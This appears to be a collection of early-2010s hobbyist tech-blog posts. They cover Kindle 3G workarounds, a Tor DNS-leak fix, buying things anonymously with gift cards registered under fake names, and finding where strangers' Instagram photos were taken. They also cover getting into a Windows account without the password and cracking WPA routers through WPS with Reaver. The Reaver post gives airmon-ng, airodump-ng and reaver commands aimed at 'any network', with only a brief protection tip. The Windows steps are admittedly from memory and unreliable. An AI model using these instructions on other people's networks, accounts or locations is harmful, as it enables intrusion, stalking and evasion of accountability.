Bypass: Kindle Touch 3G Restriction
The kindle touch is an awesome device! The only thing it lacks is being able to access the (entire) internet on amazons free 3G. Previous versions of the kindle could, but the kindle touch can’t. I can see why the did this though, i’m sure a lot more people would use it now that it has a touch screen.
So far I have only been able to access Facebook and Twitter. (I am hopping for more, I will update xD)

Instructions
NOTE: You will not be accessing facebook from the normal browser, but from a hidden browser inside the kindle. You do NOT have to jailbreak your kindle to do this.
First off go to > Kindle settings > Reading Options > Social Networks > Facebook (Or twitter)
Once you’ve clicked on Facebook (Link account). Once you click on it you will see the facebook login screen…do not login. Instead click on the “Sign up for facebook page” (Don’t worry, we will not be re signing up).
Once there, click on “Already have an account, Login”. Now login with your Facebook credentials. You should be loged into your facebook now on 3G! Now you can post, check in, stalk people…etc

Bulk Delete Books from Manage my Kindle Page
Amazon doesn’t let you delete books from Manage My Kindle in bulk. If you use chrome, you can automate the process of deleting books, so essentially… deleting in bulk. So that woul You can either delete everything from the current page, or you can delete all books with the same title. For example, I used a service to automatcly send me updates from TechCrunch daily. After a while my Manage my kindle page got overloaded with “TechCrunch” To delete them, I changed to the part that says “changetonameofbook” to the name of book I wanted auto deleted.
To excute this command you need chrome (you can on other browsers to but I use chrome). Click Command Option J (On Mac) and Ctrl Shift J (Windows) at the same time and then copy and paste the code below, making sure to change the “changetonameofbook” to the name of book you want to bulk delete. It will now delete everything named the same as that book on the current page. This is really helpful and can save a LOT of time!

Tor: Fixed DNS Leaking in New Version of Tor
The Security bug that was found a couple of days ago in Tor, has been fixed! I HIGHLY recomend you update imediatly!!! This is a VERY important update.

How to: Pay Anonymously Online
Its actually pretty easy if you think about it. You could use BitCoins…but not very many sites accept them. But you could buy a Visa Gift Card. A Visa Gift Card is basically a credit card that is not attached to anyones SSN in any way. You can pick them up at your local Target, Walmart, CVS, etc
In order to stay completely anonymous using them you should buy it with cash. And if you are signing up for something that is recurring (e.g a VPN connection) you should buy a $100 one instead (so you don’t have to keep switching out the card). Also, in order to pay online you have to register them. But they don’t ask for you SSN…so you could put in a fake address and fake name. Also I would register and pay with them using TOR. TOR hides you IP and encrypts your information online. So the company wouldn’t be able to look you up by your IP address. I am not responsible for you actions…remember that. This is fore education purposes only. So don’t be doing anything illegal (but you wouldn’t get caught…because it is anonymous ;P)
TOR: Security Bug in Current Version of TOR
A security bug was recently found in TOR! When you connect to a websocket service, your firefox will query your local dns server rather than communicating to TOR as it is supposed to do! Here is a copy from the TOR website on how to fix it!
To fix this dns leak/security hole, follow these steps:
- Type “about:config” (without the quotes) into the Firefox URL bar. Press Enter.
- Type “websocket” (again, without the quotes) into the search bar that appears below “about:config”.
- Double-click on “network.websocket.enabled”. That line should now show “false” in the ‘Value’ column.

Instagram Stores Geolocation Data in EVERY Photo without Users Knowledge
If Instagram asks you if it can use your current location, even only once, it will autmacticly store the locaction of EVERY photo taken, even though it didn’t tell you that it would do that! There is no setting to only use this for certain photos. The location wont be publicly visible (unless you select it to before you publish the photo), but it will be publicly available….
The scary thing is that this is not hard to get. All you have to do is go to ink361.com and sign in with your instagram account. Once you’ve signed in you can view all of your (and people you follow) photos. If you click on a photo it will have a little map at the botom which will tell you where the photo was taken.

Instructions
1. Go to ink361.com and sign in with your instagram account.
2. Once you’ve logged in you need to find a photo you want to geolocate. I am going to find the location of a photo on the popular page. Scroll to the bottom of the photo and you will see a little map. You can click on that map to see where the photo was taken. This does not give you an address or coordinates though, and it is hard to see street names. If you would like to see the coordinates read below.
Finding the Coordinates
1. You will need Chrome (you can do it with other browsers though). Right click on the little map and click “Inspect Element”
2. Now you should see a clump of text highlighted in blue. The coordinates will be after the part:

It will be directly after the 7C
3. Now that you have the coordinates head over to Google Maps and paste the coordinates to see the address!
UPDATE: There is an easier way to find the coordinates. Go to the website http://hashgr.am/ It will give you the option to search for a user or just search instagram. Put in the user you want, click on the photo you want….And volla, the coordinates will be at the bottom of the page with a link to google maps!
Also you don’t have to be an instagram user to do this!!!

How to turn this Off
If you would like to have Instragm stop geotagging all of you photos just go into your Settings and un-allow instgram to use your location. The downside to this is that if you want to use the actual geolcation feature (the one that lets people see the location of the photo inside the actual app) You would have to re-allow instagram to use your location (and turn it off again when done). That could be a very time consuming process.
This can be scary because if you take a photo at your house, you probably didn’t relize that people now know the address of your house. Say you had a lot of followers, maybe one of them is………a stalker -_-
Tor: Hurry up and get Tor for iOS before Apple removes it…
TOR has been around for a long time, but untill recently only for desktops. TOR encrypts your computer traffic and completely anonymizes you on the web. You can also change the IP that shows up as often as you like!
Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.
Tor sends your data through lots of servers to obscure your IP and encrypts your data so no one can see it. It is used by law enforcement, the military, normal people, journalists, activists and many others!
I may be wrong (hopefully) but I think someone accidentally let this slip Apples review processes. So hurry up and download this awesome app before Apple removes it!!!

How to: Change your Forgotten Windows Password without Software
If you’ve ever forgot your windows password, and don’t know what it is. You can change it WITHOUT software. This will work if you haven’t changed your safe mode password. If you don’t know what safe mode is, then you probably haven’t changed it!

Instructions
Step 1
Make sure you computer is shut off. Once it is off turn your computer on again and almost imediatly you will need to enter safe mode. It will say something on your screen like press f12 (Could be a different button). If you are having trouble finding the right button to push you can power off you computer by holding down the on button (Do this while its on). Don’t worry, this shouldn’t mess up your computer (but i’m not responsible if it does 😉 ) When you restart the computer it will think it has been shutdown wrong (which it has 😉 ), and will ask if you would like to enter safe mode. Click Yes.
Step 2
If it asks you if you would like to enter a GUI (Graphical Users Interface) or Text based operation, click the GUI. You will see a login screen. Login as Adminastrator (Or Admin). Now you are logged in and have FULL accsess to the machine. Go into Control panel and click on Users. Now click on change password, and type in your new password!
NOTE: I know this works on XP, and I think Vista. I am pretty sure it works with Windows 7 also. I am not sure though because I do not own a Windows anymore, and this article was just from my memory. So the way i’m describing it might not be completely acurate. But it is possible to change the password this way!
If you can’t get to the Admin account use a tool like Ophcrack Live CD. Once I get ahold of a Windows computer I will do a tutorial on Ophcrack! For now, just search the internet, there are TONS!
Crack: WPA & WPA2 Passwords in 4-10 Hours!
WPA & WPA2 used to be impossible to crack unless you used brute force. Back in Febuary, a Linux program called Reaver came that exploits a flaw in WPS (Wifi Protected Setup). This attack takes anywhere from 4-10 hours (the closer the faster). When I tried it took 8 hours. Other people have had it happen in 2!

Instructions
1. First off you will need to create a Backtrack 5 Live CD.
NOTE: A live CD is a bootable operating system that can run on any computer. Don’t worry, it won’t delete your current operating system and NOTHING will be changed. The Live CD will temporarily store the things you download to your RAM (Random Access Memory). Once you shut down the computer, everything you installed (on the live CD OS) will be deleted. And you current OS (Operating System) will be back with everything unchaged.
Head over to the Backtrack Download Page and select Bacaktrack 5 R1 > GNOME > 32 > ISO > DIRECT
Once its downloaded you need to burn the ISO to a CD.
NOTE: I will show you how to do this on a MAC but its pretty easy to do on a windows.
Open up Disk Utility. Its in the folder /Applications/Utilities/
Drag Backtrack 5 into Disk Utility, select it, and click on burn
Insert your blank CD or DVD and burn it (If it fails try burning at a lower speed).
2. Once you have Backtrack on a CD/DVD insert it in your computer and shut it down. If you are on a mac start up your computer while holding down “C” without the quotes.
If you are on a Windows you need to change your BIOS settings to start up from a CD.
3. It will take a little time to boot into Backtrack. Once you’ve reached the prompt, type startx
4. Right now, Reaver is not incorporated into the live CD. So you will have to install it. So you have to have access to a wifi network to download reaver, then you can crack any network!
Click Applications > Internet > Wicd Network Manager
Click on the network you want to connect to download reaver (not the one you want to crack).
Now that your connected to the internet, its time to install Reaver!
Open up terminal Applications > Accessories > Terminal
At the Prompt, type:
apt-get update
After the update type:
apt-get install reaver
Reaver should be installed now!
5. You need to find out your wireless card, in terminal type:
iwconfig
Your card most likely will be named wlan0. But it could be called something else, you will need to determine this on your own.
Now we will put your card into monitor mode! Type:
airmon-ng start wlan0
NOTE: I am assuming that your wireless card is wlan0, if it is not replace wlan0 with your wireless card!
Now you need to get the BSSID of the router you want to crack. To do this type:
airodump-ng wlan0
If wlan0 doesn’t work try mon0
You will start to see wireless networks show up. Once the one you want to crack is on your screen, click Ctrl+C
Copy the BSSID down on notepad or a piece of papper.
6. Now you are going to start using reaver! Replace moniterface and BSSID with the BSSID and the monitor interface you copied above!
reaver -i moninterface -b bssid -vv
Reaver will start preforming its creepy magic! It will try a bunch of different WPS pins (Wifi Protected Setup) to determine your password!
How to Protect Yourself against Reaver?
You can protect yourself by turning off WPS in your routers settings. This doesn’t always work though. Or you can install DD-WRT which is a new firmware for you router that gives it TONS of new features, and…it doesn’t support WPS. So you will be protected xD
